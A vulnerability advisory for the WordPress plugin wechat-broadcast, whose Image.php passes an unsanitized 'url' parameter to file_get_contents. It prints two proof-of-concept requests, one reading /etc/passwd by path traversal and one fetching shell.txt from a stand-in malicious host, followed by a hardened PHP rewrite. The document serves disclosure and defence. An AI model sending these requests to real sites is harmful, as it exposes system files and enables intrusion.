This bug was found in the file /wechat-broadcast/wechat/Image.php:

    echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');

The "url" parameter is not sanitized, which allows local or remote files to be included.

To exploit the vulnerability, it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.

Local File Inclusion POC:
GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

Remote File Inclusion POC:
GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt
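
A hardened form of the Image.php line quoted at the top of this advisory, as an added example; it is not the plugin's own code or an official patch. It assumes the script only has to relay images from a known set of HTTPS hosts. ALLOWED_HOSTS (holding the placeholder host images.example.com), MAX_BYTES and validate_image_url() are hypothetical names.

```php
<?php
// Added example, not the plugin's code. ALLOWED_HOSTS holds a placeholder host
// (assumption): list only the image hosts this site actually has to relay.
const ALLOWED_HOSTS = ['images.example.com'];
const MAX_BYTES = 5 * 1024 * 1024; // cap on relayed bytes (assumed limit)

// Returns the URL if it is an https URL on an allowed host, otherwise null.
function validate_image_url(string $raw): ?string
{
    $parts = parse_url($raw);
    // Relative paths such as ../../etc/passwd have no scheme and no host.
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Rejects file://, php://, data://, ftp:// and plain http://.
    if (strtolower($parts['scheme']) !== 'https') {
        return null;
    }
    // No credentials or custom ports, which can disguise the real target.
    if (isset($parts['user']) || isset($parts['pass']) || isset($parts['port'])) {
        return null;
    }
    return in_array(strtolower($parts['host']), ALLOWED_HOSTS, true) ? $raw : null;
}

$raw = (isset($_GET['url']) && is_string($_GET['url'])) ? $_GET['url'] : '';
$url = validate_image_url($raw);
if ($url === null) {
    http_response_code(400);
    exit;
}

// Do not follow redirects: an allowed host could bounce the fetch elsewhere.
$ctx = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 5]]);
$body = @file_get_contents($url, false, $ctx, 0, MAX_BYTES);
if ($body === false) {
    http_response_code(502);
    exit;
}

// Relay the body only if its content really is an image.
$mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($body);
if (!in_array($mime, ['image/jpeg', 'image/png', 'image/gif'], true)) {
    http_response_code(415);
    exit;
}
header('Content-Type: ' . $mime);
header('X-Content-Type-Options: nosniff');
echo $body;
```

Both requests shown in the POCs above are answered with 400 by this version: the traversal path has no scheme or host, and http://malicious.url is neither https nor on the allowlist.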